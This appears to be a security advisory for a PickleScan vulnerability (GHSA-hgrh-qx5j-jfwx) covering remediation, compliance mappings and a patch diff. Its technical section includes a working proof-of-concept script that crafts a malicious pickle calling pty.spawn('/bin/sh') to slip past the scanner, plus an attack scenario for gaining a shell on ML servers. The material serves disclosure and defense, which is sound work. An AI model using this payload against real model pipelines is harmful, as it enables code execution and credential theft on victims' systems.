GHSA-hgrh-qx5j-jfwx

GHSA-hgrh-qx5j-jfwx HIGH
Published December 29, 2025
CISO Take

Any organization using PickleScan as a security gate for ML model ingestion — particularly PyTorch models from HuggingFace or internal model registries — must upgrade to picklescan >= 0.0.33 immediately. The critical failure is that PickleScan classifies pty.spawn as 'suspicious' rather than 'dangerous', meaning automated pipelines may auto-approve malicious models, creating a false sense of security worse than no scanner at all. Patch now, audit your model registry for files scanned with older versions, and mandate SafeTensors as a longer-term architectural control.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.33 0.0.33

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1. PATCH (immediate): pip install --upgrade 'picklescan>=0.0.33' across all environments — dev, CI/CD, and production scanners. Verify with picklescan --version. 2. AUDIT: Scan your model registry for files ingested between last picklescan version bump and your upgrade date using the patched scanner. Flag any file that previously returned 'suspicious' on pty globals. 3. WORKAROUND (if upgrade is blocked): Manually patch scanner.py to add 'pty': {'spawn'} to _unsafe_globals dict as shown in the advisory diff. 4. DETECT: Grep model files for the byte sequence 'pty\nspawn' (pickled GLOBAL opcode pattern). 5. HARDEN: Mandate SafeTensors format for all model distribution to eliminate pickle deserialization risk entirely. Layer defenses — never treat a single scanner as a sufficient control for untrusted model ingestion.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity of high-risk AI systems
ISO 42001
8.4 - AI system risk controls — third-party and supply chain A.6.2 - AI system supply chain and third-party components
NIST AI RMF
GOVERN 1.7 - Processes for delineating AI risk responsibilities MANAGE 2.4 - Mechanisms to sustain effectiveness of risk mitigations MAP 5.2 - Practices and capabilities to detect AI system failures and vulnerabilities
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Technical Details

NVD Description

### Summary The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of the `pty.spawn` function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats. ### Details For 2025's [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released. The intended way was to use `pty.spawn` but some players found alternative solutions. ### PoC - Run the following Python code to generate the PoC pickle file. ```py import pickle command = b"/bin/sh" payload = b"".join( [ pickle.PROTO + pickle.pack("B", 4), pickle.MARK, pickle.GLOBAL + b"pty\n" + b"spawn\n", pickle.EMPTY_LIST, pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command, pickle.APPEND, # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes pickle.OBJ, pickle.STOP, ] ) with open("dump.pkl", "wb") as f: f.write(payload) ``` - Run PickleScan on the generated pickle file. <img width="936" height="311" alt="picklescan_bypass_pty_spawn" src="https://github.com/user-attachments/assets/0d6430e4-a7e5-461c-9d75-c607f6886c9f" /> PickleScan detects the `pty.spawn` global as "suspicious" but not "dangerous", allowing it to be loaded. ### Impact **Severity**: High **Affected Users**: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content. **Impact Details**: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the `pty.spawn` function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded. ### Suggested Patch ``` diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py index 34a5715..b434069 100644 --- a/src/picklescan/scanner.py +++ b/src/picklescan/scanner.py @@ -150,6 +150,7 @@ _unsafe_globals = { "_pickle": "*", "pip": "*", "profile": {"Profile.run", "Profile.runctx"}, + "pty": "spawn", "pydoc": "pipepager", # pydoc.pipepager('help','echo pwned') "timeit": "*", "torch._dynamo.guards": {"GuardBuilder.get"}, ```

Exploitation Scenario

An adversary targeting an organization that ingests PyTorch models from HuggingFace Hub or an internal model registry crafts a malicious .pkl checkpoint using the public PoC — a 10-line Python script embedding pty.spawn('/bin/sh') as the pickle payload. The file is submitted as a legitimate-looking model. PickleScan runs in the CI/CD pipeline, classifies pty.spawn as 'suspicious' (not 'dangerous'), and the automated gate approves the file. When a data scientist or inference server loads the checkpoint, pty.spawn executes, granting the attacker an interactive shell — likely on a GPU training server or production inference endpoint with access to proprietary model weights, S3 buckets, and cloud IAM credentials.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026